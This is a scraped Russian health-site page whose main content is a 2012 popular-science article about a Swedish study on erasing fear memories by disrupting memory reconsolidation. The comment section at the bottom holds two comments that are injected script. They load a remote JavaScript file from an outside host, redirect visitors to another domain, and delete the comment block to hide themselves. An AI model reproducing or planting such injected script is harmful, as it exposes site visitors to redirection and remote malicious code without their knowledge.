Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые научились стирать ...  >>  Ученые научились стирать память
 
Обратная связь
 

Ученые научились стирать память

Размер шрифта
01 ноября 2012 00:01
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Шведские ученые нашли способ избавить людей от страха за счет нарушения процесса запоминания информации.

ученые научились стирать память

Что такое память

Память – это вид умственной деятельности, который предназначен для хранения, накопления и воспроизведения информации.

В зависимости от длительности хранения информации выделяют два вида памяти: кратковременную и долговременную. В основе кратковременной памяти лежат временные связи между нейронами головного мозга. Процесс перехода информации из кратковременной памяти в долговременную (консолидация) сопровождается образованием белков. 

Следует отметить, что мы помним совсем не то, что случилось на самом деле. Наши воспоминания о событии – это воспоминания о воспоминаниях, т.е. воспоминания о том, как мы последний раз вспоминали о событии. Нарушив повторную консолидацию памяти, можно воздействовать на сохраненную информацию.

Суть исследования

В ходе исследования участникам показывали нейтральные картинки и одновременно воздействовали на них электрическим током. С помощью электрического тока ученые формировали у людей память страха перед картинками. Для того чтобы активировать эту память, они снова показывали людям картинки, но уже не воздействовали электрическим током. В экспериментальной группе повторная консолидация памяти была нарушена с помощью повторения просмотра картинок, а в контрольной группе к моменту повторения просмотра картинок повторная консолидация была завершена.

Результаты

В экспериментальной группе страх, связанный с картинкой, исчез. Таким образом, нарушив повторную консолидацию памяти, можно избавить человека от страха. Полученные результаты были подтверждены с помощью магнитно-резонансной томографии.

Данное открытие является настоящим прорывом в области изучения памяти и страха. Возможно, в будущем ученым удастся разработать новые методы лечения фобий, посттравматического стресса и панических атак, которыми страдают многие люди.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Отсутствие общения высушивает нервы   Открытие в науке: обнаружен белок, восстанавливающий нервы   Беспамятство. Как помнить все   Ученые победили старость: забытое лекарство возвращает память  
25 января 2013Обезьян научили определять время без часов 31 октября 2012Ученые научились стирать память!
 
28 февраля 2013Мы не помним слов, сказанных на эмоциях 09 октября 2012Пассивное курение «убивает» вашу память!
 

Слайдшоу

1
Супереда от Паркинсона
Вспомнить все. Часть 2
Как не сойти с ума в старости

Тесты

Возраст мозга
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.